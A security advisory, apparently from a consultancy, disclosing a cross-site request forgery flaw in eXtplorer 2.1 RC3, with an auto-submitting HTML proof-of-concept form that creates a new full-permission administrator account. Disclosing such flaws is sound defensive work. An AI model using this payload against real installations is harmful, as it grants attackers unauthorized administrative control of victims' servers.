Home
Consulting
Advisories
Software
Articles
Contact

eXtplorer 2.1 RC3 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in eXtplorer 2.1 RC3 can be exploited to create a new admin.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/extplorer/index.php">
            <input type="hidden" name="option" value="com_extplorer" />
            <input type="hidden" name="user" value="" />
            <input type="hidden" name="action" value="admin" />
            <input type="hidden" name="action2" value="adduser" />
            <input type="hidden" name="confirm" value="true" />
            <input type="hidden" name="nuser" value="new_admin" />
            <input type="hidden" name="pass1" value="Password1" />
            <input type="hidden" name="pass2" value="Password1" />
            <input type="hidden" name="home_dir" value="c:/" />
            <input type="hidden" name="home_url" value="http://localhost" />
            <input type="hidden" name="show_hidden" value="1" />
            <input type="hidden" name="no_access" value="" />
            <input type="hidden" name="permissions" value="7" />
            <input type="hidden" name="active" value="1" />
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC